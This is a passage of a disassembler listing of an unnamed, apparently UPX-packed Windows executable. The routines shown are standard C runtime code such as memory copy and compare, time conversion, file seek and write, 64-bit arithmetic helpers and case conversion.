; ---------------------------------------------------------------------------
align 4
dd offset loc_41CF24
dd offset loc_41CF2C
dd offset loc_41CF34
dd offset loc_41CF3C
dd offset loc_41CF44
dd offset loc_41CF4C
dd offset loc_41CF54
off_41CF20 dd offset loc_41CF67 ; DATA XREF: sub_41CC90+1C2�r
; ---------------------------------------------------------------------------
loc_41CF24: ; DATA XREF: sub_41CC90+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41CF2C: ; DATA XREF: sub_41CC90+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_41CF34: ; DATA XREF: sub_41CC90+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41CF3C: ; DATA XREF: sub_41CC90+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_41CF44: ; DATA XREF: sub_41CC90+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41CF4C: ; DATA XREF: sub_41CC90+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_41CF54: ; DATA XREF: sub_41CC90+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41CF67: ; CODE XREF: sub_41CC90+1C2�j
; DATA XREF: sub_41CC90:off_41CF20�o
jmp off_41CF70[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41CF70 dd offset loc_41CF80 ; DATA XREF: sub_41CC90+1B7�r
; sub_41CC90:loc_41CE74�r ...
dd offset loc_41CF88
dd offset loc_41CF98
dd offset loc_41CFAC
; ---------------------------------------------------------------------------
loc_41CF80: ; CODE XREF: sub_41CC90+1B7�j
; sub_41CC90:loc_41CE74�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41CF88: ; CODE XREF: sub_41CC90+1B7�j
; sub_41CC90:loc_41CE74�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41CF98: ; CODE XREF: sub_41CC90+1B7�j
; sub_41CC90:loc_41CE74�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41CFAC: ; CODE XREF: sub_41CC90+1B7�j
; sub_41CC90:loc_41CE74�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41CC90 endp
; =============== S U B R O U T I N E =======================================
sub_41CFC5 proc near ; CODE XREF: sub_40D78C+34�p
; sub_40D78C+4F�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_41B4E7
pop ecx
pop ecx
retn
sub_41CFC5 endp
; =============== S U B R O U T I N E =======================================
sub_41CFD3 proc near ; CODE XREF: sub_41D040+4�p
arg_0 = dword ptr 4
push esi
push ds:dword_4DCFFC
call sub_422608
mov edx, ds:dword_4DCFFC
pop ecx
mov ecx, ds:dword_4DCFF8
mov esi, ecx
sub esi, edx
add esi, 4
cmp eax, esi
pop esi
jnb short loc_41D032
push edx
call sub_422608
add eax, 10h
push eax
push ds:dword_4DCFFC
call sub_41B202
add esp, 0Ch
test eax, eax
jnz short loc_41D015
retn
; ---------------------------------------------------------------------------
loc_41D015: ; CODE XREF: sub_41CFD3+3F�j
mov ecx, ds:dword_4DCFF8
sub ecx, ds:dword_4DCFFC
mov ds:dword_4DCFFC, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov ds:dword_4DCFF8, ecx
loc_41D032: ; CODE XREF: sub_41CFD3+23�j
mov eax, [esp+arg_0]
mov [ecx], eax
add ds:dword_4DCFF8, 4
retn
sub_41CFD3 endp
; =============== S U B R O U T I N E =======================================
sub_41D040 proc near ; CODE XREF: sub_40D879+1A�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41CFD3
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_41D040 endp
; =============== S U B R O U T I N E =======================================
sub_41D052 proc near ; DATA XREF: UPX0:0042901C�o
push 80h
call sub_41B4D5
test eax, eax
pop ecx
mov ds:dword_4DCFFC, eax
jnz short loc_41D073
push 18h
call sub_41DA29
mov eax, ds:dword_4DCFFC
pop ecx
loc_41D073: ; CODE XREF: sub_41D052+12�j
and dword ptr [eax], 0
mov eax, ds:dword_4DCFFC
mov ds:dword_4DCFF8, eax
retn
sub_41D052 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D081 proc near ; CODE XREF: sub_40D99C+1B0�p
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
call dword_42712C ; GetLocalTime
lea eax, [ebp+var_20]
push eax
call dword_4271A4 ; GetSystemTime
mov ax, [ebp+var_16]
cmp ax, ds:word_4DB9C2
jnz short loc_41D0E6
mov ax, [ebp+var_18]
cmp ax, ds:word_4DB9C0
jnz short loc_41D0E6
mov ax, [ebp+var_1A]
cmp ax, ds:word_4DB9BE
jnz short loc_41D0E6
mov ax, [ebp+var_1E]
cmp ax, ds:word_4DB9BA
jnz short loc_41D0E6
mov ax, [ebp+var_20]
cmp ax, ds:word_4DB9B8
jnz short loc_41D0E6
mov eax, ds:dword_4DB9B0
jmp short loc_41D12B
; ---------------------------------------------------------------------------
loc_41D0E6: ; CODE XREF: sub_41D081+28�j
; sub_41D081+35�j ...
lea eax, [ebp+var_CC]
push eax
call dword_4271A0 ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz short loc_41D113
cmp eax, 2
jnz short loc_41D10F
cmp [ebp+var_32], 0
jz short loc_41D10F
cmp [ebp+var_24], 0
jz short loc_41D10F
push 1
pop eax
jmp short loc_41D116
; ---------------------------------------------------------------------------
loc_41D10F: ; CODE XREF: sub_41D081+7A�j
; sub_41D081+81�j ...
xor eax, eax
jmp short loc_41D116
; ---------------------------------------------------------------------------
loc_41D113: ; CODE XREF: sub_41D081+75�j
or eax, 0FFFFFFFFh
loc_41D116: ; CODE XREF: sub_41D081+8C�j
; sub_41D081+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_4DB9B8
movsd
movsd
movsd
movsd
pop edi
mov ds:dword_4DB9B0, eax
pop esi
loc_41D12B: ; CODE XREF: sub_41D081+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_422669
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_41D15B
mov [ecx], eax
locret_41D15B: ; CODE XREF: sub_41D081+D6�j
leave
retn
sub_41D081 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D160 proc near ; CODE XREF: sub_40D99C+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
lea eax, dword_4DBA0C
cmp dword ptr [eax+8], 0
jnz short loc_41D1B3
mov al, 0FFh
mov edi, edi
loc_41D17C: ; CODE XREF: sub_41D160+28�j
; sub_41D160+48�j
or al, al
jz short loc_41D1AE
mov al, [esi]
inc esi
mov ah, [edi]
inc edi
cmp ah, al
jz short loc_41D17C
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_41D17C
sbb al, al
sbb al, 0FFh
loc_41D1AE: ; CODE XREF: sub_41D160+1E�j
movsx eax, al
jmp short loc_41D1E7
; ---------------------------------------------------------------------------
loc_41D1B3: ; CODE XREF: sub_41D160+16�j
mov eax, 0FFh
xor ebx, ebx
mov edi, edi
loc_41D1BC: ; CODE XREF: sub_41D160+68�j
; sub_41D160+80�j
or al, al
jz short loc_41D1E7
mov al, [esi]
inc esi
mov bl, [edi]
inc edi
cmp al, bl
jz short loc_41D1BC
push eax
push ebx
call sub_41D74C
mov ebx, eax
add esp, 4
call sub_41D74C
add esp, 4
cmp bl, al
jz short loc_41D1BC
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_41D1E7: ; CODE XREF: sub_41D160+51�j
; sub_41D160+5E�j
pop ebx
pop esi
pop edi
leave
retn
sub_41D160 endp
; =============== S U B R O U T I N E =======================================
sub_41D1EC proc near ; CODE XREF: sub_411797+26E�p
; sub_411797+37D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41D268
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_41D20B
cmp edi, 1
jz short loc_41D20B
cmp edi, 2
jnz short loc_41D268
loc_41D20B: ; CODE XREF: sub_41D1EC+13�j
; sub_41D1EC+18�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_41D222
push esi
call sub_4227C5
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_41D222: ; CODE XREF: sub_41D1EC+27�j
push esi
call sub_41DB8B
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_41D237
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_41D24B
; ---------------------------------------------------------------------------
loc_41D237: ; CODE XREF: sub_41D1EC+42�j
test al, 1
jz short loc_41D24B
test al, 8
jz short loc_41D24B
test ah, 4
jnz short loc_41D24B
mov dword ptr [esi+18h], 200h
loc_41D24B: ; CODE XREF: sub_41D1EC+49�j
; sub_41D1EC+4D�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_42272B
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_41D275
; ---------------------------------------------------------------------------
loc_41D268: ; CODE XREF: sub_41D1EC+B�j
; sub_41D1EC+1D�j
mov ds:dword_4DB958, 16h
or eax, 0FFFFFFFFh
loc_41D275: ; CODE XREF: sub_41D1EC+7A�j
pop edi
pop esi
retn
sub_41D1EC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41D280 proc near ; CODE XREF: sub_412B09+19E�p
; sub_41386C+11B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_41D299
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_41D299: ; CODE XREF: sub_41D280+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_41D280 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D2B4 proc near ; CODE XREF: sub_4161BD+127�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
test edi, edi
mov [ebp+arg_0], eax
mov ebx, edi
jnz short loc_41D2D8
xor eax, eax
jmp loc_41D3A5
; ---------------------------------------------------------------------------
loc_41D2D8: ; CODE XREF: sub_41D2B4+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_41D2EB
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_41D2F2
; ---------------------------------------------------------------------------
loc_41D2EB: ; CODE XREF: sub_41D2B4+2D�j
mov [ebp+arg_C], 1000h
loc_41D2F2: ; CODE XREF: sub_41D2B4+35�j
; sub_41D2B4+E8�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_41D326
mov eax, [esi+4]
test eax, eax
jz short loc_41D326
cmp ebx, eax
mov edi, ebx
jb short loc_41D30C
mov edi, eax
loc_41D30C: ; CODE XREF: sub_41D2B4+54�j
push edi
push [ebp+arg_0]
push dword ptr [esi]
call sub_41C310
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+arg_0], edi
jmp short loc_41D36C
; ---------------------------------------------------------------------------
loc_41D326: ; CODE XREF: sub_41D2B4+47�j
; sub_41D2B4+4E�j
cmp ebx, [ebp+arg_C]
jb short loc_41D371
test ecx, ecx
jz short loc_41D33A
push esi
call sub_41DB8B
test eax, eax
pop ecx
jnz short loc_41D3B3
loc_41D33A: ; CODE XREF: sub_41D2B4+79�j
cmp [ebp+arg_C], 0
jz short loc_41D34D
mov eax, ebx
xor edx, edx
div [ebp+arg_C]
mov edi, ebx
sub edi, edx
jmp short loc_41D34F
; ---------------------------------------------------------------------------
loc_41D34D: ; CODE XREF: sub_41D2B4+8A�j
mov edi, ebx
loc_41D34F: ; CODE XREF: sub_41D2B4+97�j
push edi
push [ebp+arg_0]
push dword ptr [esi+10h]
call sub_42291D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_41D3AA
add [ebp+arg_0], eax
sub ebx, eax
cmp eax, edi
jb short loc_41D3AA
loc_41D36C: ; CODE XREF: sub_41D2B4+70�j
mov edi, [ebp+var_4]
jmp short loc_41D39A
; ---------------------------------------------------------------------------
loc_41D371: ; CODE XREF: sub_41D2B4+75�j
mov eax, [ebp+arg_0]
push esi
movsx eax, byte ptr [eax]
push eax
call sub_41F58A
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41D3B3
inc [ebp+arg_0]
mov eax, [esi+18h]
dec ebx
mov [ebp+arg_C], eax
test eax, eax
jg short loc_41D39A
mov [ebp+arg_C], 1
loc_41D39A: ; CODE XREF: sub_41D2B4+BB�j
; sub_41D2B4+DD�j
test ebx, ebx
jnz loc_41D2F2
mov eax, [ebp+arg_8]
loc_41D3A5: ; CODE XREF: sub_41D2B4+1F�j
; sub_41D2B4+108�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41D3AA: ; CODE XREF: sub_41D2B4+AD�j
; sub_41D2B4+B6�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_4]
jmp short loc_41D3B5
; ---------------------------------------------------------------------------
loc_41D3B3: ; CODE XREF: sub_41D2B4+84�j
; sub_41D2B4+CF�j
mov eax, edi
loc_41D3B5: ; CODE XREF: sub_41D2B4+FD�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_41D3A5
sub_41D2B4 endp
; =============== S U B R O U T I N E =======================================
sub_41D3BE proc near ; CODE XREF: sub_416909+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call dword_427098 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_41D3DE
call dword_42708C ; RtlGetLastWin32Error
push eax
call sub_4203DF
pop ecx
loc_41D3DA: ; CODE XREF: sub_41D3BE+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41D3DE: ; CODE XREF: sub_41D3BE+D�j
test al, 1
jz short loc_41D3FF
test [esp+arg_4], 2
jz short loc_41D3FF
mov ds:dword_4DB958, 0Dh
mov ds:dword_4DB95C, 5
jmp short loc_41D3DA
; ---------------------------------------------------------------------------
loc_41D3FF: ; CODE XREF: sub_41D3BE+22�j
; sub_41D3BE+29�j
xor eax, eax
retn
sub_41D3BE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41D410 proc near ; CODE XREF: sub_416923+3F�p
; sub_41A98D+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_41D432
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_41D473
; ---------------------------------------------------------------------------
loc_41D432: ; CODE XREF: sub_41D410+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_41D440: ; CODE XREF: sub_41D410+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41D440
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_41D46E
cmp edx, [esp+8+arg_4]
ja short loc_41D46E
jb short loc_41D46F
cmp eax, [esp+8+arg_0]
jbe short loc_41D46F
loc_41D46E: ; CODE XREF: sub_41D410+4E�j
; sub_41D410+54�j
dec esi
loc_41D46F: ; CODE XREF: sub_41D410+56�j
; sub_41D410+5C�j
xor edx, edx
mov eax, esi
loc_41D473: ; CODE XREF: sub_41D410+20�j
pop esi
pop ebx
retn 10h
sub_41D410 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41D480 proc near ; CODE XREF: sub_416923+2D�p
; sub_41A98D+3D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_41D4A1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_41D4F1
; ---------------------------------------------------------------------------
loc_41D4A1: ; CODE XREF: sub_41D480+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41D4AF: ; CODE XREF: sub_41D480+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41D4AF
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_41D4DA
cmp edx, [esp+4+arg_4]
ja short loc_41D4DA
jb short loc_41D4E2
cmp eax, [esp+4+arg_0]
jbe short loc_41D4E2
loc_41D4DA: ; CODE XREF: sub_41D480+4A�j
; sub_41D480+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_41D4E2: ; CODE XREF: sub_41D480+52�j
; sub_41D480+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_41D4F1: ; CODE XREF: sub_41D480+1F�j
pop ebx
retn 10h
sub_41D480 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41D500 proc near ; CODE XREF: sub_416A33+5F�p
; sub_416A33+92�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_41D521
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_41D521: ; CODE XREF: sub_41D500+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41D53D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41D53D: ; CODE XREF: sub_41D500+27�j
or eax, eax
jnz short loc_41D559
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41D59A
; ---------------------------------------------------------------------------
loc_41D559: ; CODE XREF: sub_41D500+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_41D567: ; CODE XREF: sub_41D500+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_41D567
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_41D595
cmp edx, [esp+0Ch+arg_4]
ja short loc_41D595
jb short loc_41D596
cmp eax, [esp+0Ch+arg_0]
jbe short loc_41D596
loc_41D595: ; CODE XREF: sub_41D500+85�j
; sub_41D500+8B�j
dec esi
loc_41D596: ; CODE XREF: sub_41D500+8D�j
; sub_41D500+93�j
xor edx, edx
mov eax, esi
loc_41D59A: ; CODE XREF: sub_41D500+57�j
dec edi
jnz short loc_41D5A4
neg edx
neg eax
sbb edx, 0
loc_41D5A4: ; CODE XREF: sub_41D500+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_41D500 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D5AA proc near ; CODE XREF: sub_4170ED+BF�p
; sub_4170ED+12C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4DBA14
push ebx
xor ebx, ebx
cmp eax, ebx
mov [ebp+var_4], ebx
jnz short loc_41D5DE
mov eax, [ebp+arg_0]
mov edx, eax
cmp [eax], bl
jz short loc_41D645
loc_41D5C6: ; CODE XREF: sub_41D5AA+30�j
mov cl, [edx]
cmp cl, 61h
jl short loc_41D5D7
cmp cl, 7Ah
jg short loc_41D5D7
sub cl, 20h
mov [edx], cl
loc_41D5D7: ; CODE XREF: sub_41D5AA+21�j
; sub_41D5AA+26�j
inc edx
cmp [edx], bl
jnz short loc_41D5C6
jmp short loc_41D645
; ---------------------------------------------------------------------------
loc_41D5DE: ; CODE XREF: sub_41D5AA+11�j
push esi
push edi
push 1
push ebx
push ebx
push ebx
push 0FFFFFFFFh
mov esi, 200h
push [ebp+arg_0]
push esi
push eax
call sub_422ACA
mov edi, eax
add esp, 20h
cmp edi, ebx
jz short loc_41D637
push edi
call sub_41B4D5
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_41D637
push 1
push ebx
push edi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push ds:dword_4DBA14
call sub_422ACA
add esp, 20h
test eax, eax
jz short loc_41D637
push [ebp+var_4]
push [ebp+arg_0]
call sub_41BEB0
pop ecx
pop ecx
loc_41D637: ; CODE XREF: sub_41D5AA+53�j
; sub_41D5AA+61�j ...
push [ebp+var_4]
call sub_41B0B1
mov eax, [ebp+arg_0]
pop ecx
pop edi
pop esi
loc_41D645: ; CODE XREF: sub_41D5AA+1A�j
; sub_41D5AA+32�j
pop ebx
leave
retn
sub_41D5AA endp
; =============== S U B R O U T I N E =======================================
sub_41D648 proc near ; CODE XREF: sub_417ADE+1A8�p
arg_0 = dword ptr 4
cmp dword_43CBE4, 1
jle short loc_41D65F
push 4
push [esp+4+arg_0]
call sub_41F515
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41D65F: ; CODE XREF: sub_41D648+7�j
mov eax, [esp+arg_0]
mov ecx, off_43C9D8
mov al, [ecx+eax*2]
and eax, 4
retn
sub_41D648 endp
; =============== S U B R O U T I N E =======================================
sub_41D670 proc near ; CODE XREF: sub_420510+76�p
; sub_420510+88�p ...
arg_0 = dword ptr 4
cmp dword_43CBE4, 1
jle short loc_41D687
push 8
push [esp+4+arg_0]
call sub_41F515
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41D687: ; CODE XREF: sub_41D670+7�j
mov eax, [esp+arg_0]
mov ecx, off_43C9D8
mov al, [ecx+eax*2]
and eax, 8
retn
sub_41D670 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+0Ch]
test eax, eax
jz short locret_41D6EC
mov edx, [esp+4]
push esi
push edi
mov esi, edx
mov edi, [esp+10h]
or edx, edi
and edx, 3
jz short loc_41D6ED
test eax, 1
jz short loc_41D6CD
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41D71A
inc esi
inc edi
dec eax
jz short loc_41D6EA
loc_41D6CD: ; CODE XREF: UPX0:0041D6C0�j
; UPX0:0041D6E8�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41D71A
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41D71A
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41D6CD
loc_41D6EA: ; CODE XREF: UPX0:0041D6CB�j
; UPX0:0041D724�j
pop edi
pop esi
locret_41D6EC: ; CODE XREF: UPX0:0041D6A6�j
retn
; ---------------------------------------------------------------------------
loc_41D6ED: ; CODE XREF: UPX0:0041D6B9�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_41D722
repe cmpsd
jz short loc_41D722
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_41D715
cmp ch, dh
jnz short loc_41D715
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_41D715
cmp ch, dh
loc_41D715: ; CODE XREF: UPX0:0041D703�j
; UPX0:0041D707�j ...
mov eax, 0
loc_41D71A: ; CODE XREF: UPX0:0041D6C6�j
; UPX0:0041D6D3�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41D722: ; CODE XREF: UPX0:0041D6F5�j
; UPX0:0041D6F9�j
test eax, eax
jz short loc_41D6EA
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_41D715
dec eax
jz short loc_41D749
cmp dh, ch
jnz short loc_41D715
dec eax
jz short loc_41D749
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_41D715
dec eax
loc_41D749: ; CODE XREF: UPX0:0041D72F�j
; UPX0:0041D736�j
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D74C proc near ; CODE XREF: sub_418069+6�p
; sub_418087+4A�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4DBA14, 0
push ebx
push esi
push edi
jnz short loc_41D779
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_41D812
cmp eax, 5Ah
jg loc_41D812
add eax, 20h
jmp loc_41D812
; ---------------------------------------------------------------------------
loc_41D779: ; CODE XREF: sub_41D74C+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_41D7AD
cmp dword_43CBE4, esi
jle short loc_41D79B
push esi
push ebx
call sub_41F515
pop ecx
pop ecx
jmp short loc_41D7A5
; ---------------------------------------------------------------------------
loc_41D79B: ; CODE XREF: sub_41D74C+42�j
mov eax, off_43C9D8
mov al, [eax+ebx*2]
and eax, esi
loc_41D7A5: ; CODE XREF: sub_41D74C+4D�j
test eax, eax
jnz short loc_41D7AD
loc_41D7A9: ; CODE XREF: sub_41D74C+AD�j
mov eax, ebx
jmp short loc_41D812
; ---------------------------------------------------------------------------
loc_41D7AD: ; CODE XREF: sub_41D74C+3A�j
; sub_41D74C+5B�j
mov edx, off_43C9D8
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41D7D1
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_41D7DA
; ---------------------------------------------------------------------------
loc_41D7D1: ; CODE XREF: sub_41D74C+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_41D7DA: ; CODE XREF: sub_41D74C+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push ds:dword_4DBA14
call sub_422ACA
add esp, 20h
test eax, eax
jz short loc_41D7A9
cmp eax, esi
jnz short loc_41D805
movzx eax, [ebp+var_4]
jmp short loc_41D812
; ---------------------------------------------------------------------------
loc_41D805: ; CODE XREF: sub_41D74C+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_41D812: ; CODE XREF: sub_41D74C+16�j
; sub_41D74C+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41D74C endp
; =============== S U B R O U T I N E =======================================
sub_41D817 proc near ; CODE XREF: sub_4185A5+AD�p
